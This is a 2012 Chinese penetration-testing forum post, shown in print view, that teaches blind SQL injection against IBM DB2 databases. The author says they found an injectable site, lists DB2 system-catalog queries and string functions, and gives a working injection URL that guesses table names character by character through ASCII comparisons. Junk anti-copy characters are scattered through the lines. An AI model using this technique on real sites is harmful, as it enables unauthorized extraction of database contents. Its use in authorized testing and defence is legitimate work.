中国网络渗透测试联盟

标题: Sql Injection in DB2数据库 [打印本页]

作者: admin    时间: 2012-9-15 14:06
标题: Sql Injection in DB2数据库
使用DB2的人比较少了,今天碰到了一个可供注入的DB2网站,想试试身手。不过在网上很难找到相关的资料,只好自己研究了。
: ]; ]9 L3 l, A6 l& w参考了IBM DB2的文档,总结了这样几条:
$ D2 X5 M! I- R7 h8 V& ^1、select NAME from SYSIBM.SYSTABLES where CREATOR =USER 5 h: ^% }- g% h+ G
可以返回系统中所有用户创建的表(table)名
9 l) b* j7 u! i4 n2 w2、select NAME from SYSIBM.SYSCOLUMNS where TBCREATOR = '' and TBNAME='' ! x. t" B! m* N4 P$ ~8 ]
返回表中的列名 ) L( ^% F1 f! |# b
3、select NAME from SYSIBM.SYSTABLES where CREATOR =USER FETCH FIRST 1 ROWS ONLY
1 `* |. u2 ^( ?2 y0 d这是最关键的地方,返回第一条记录,类似于sql server中的top 1   \# K* U4 \5 S5 P
4、SUBSTR(string, position, length) 0 x3 G% s; h1 x1 n# d% s
返回字符串子串的函数,类似于mid 3 j: U' @  [, x5 }) D) d
5、ASCII()这个就不用多说了。 ' |( \4 `( d6 I3 F( E# _; d
有了这些语句和函数,我们就可以很方便的用ascii拆半法猜出所有的table名,字段名,以及其中的数据了。
, \/ Y, P+ o0 h0 ?$ r例如判断第一个table的名称的第一个字符的ascii码是否大于50:
5 ?7 U/ F, j! ?# W# G5 P3 N- ]http://*.com?test.jsp?id=1 and (select ASCII(SUBSTR(NAME,1,1)) from SYSIBM.SYSTABLES where CREATOR =USER FETCH FIRST 1 ROWS ONLY)>50 --
% L" ?% h* R+ p2 z8 e: q
% t5 x% j3 `2 `2 t( N- a5 k, mhttp://blog.waynedeng.com/blogview.asp?logID=543
1 L3 U% K; Z: f" {) w# D1 D2 Y




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2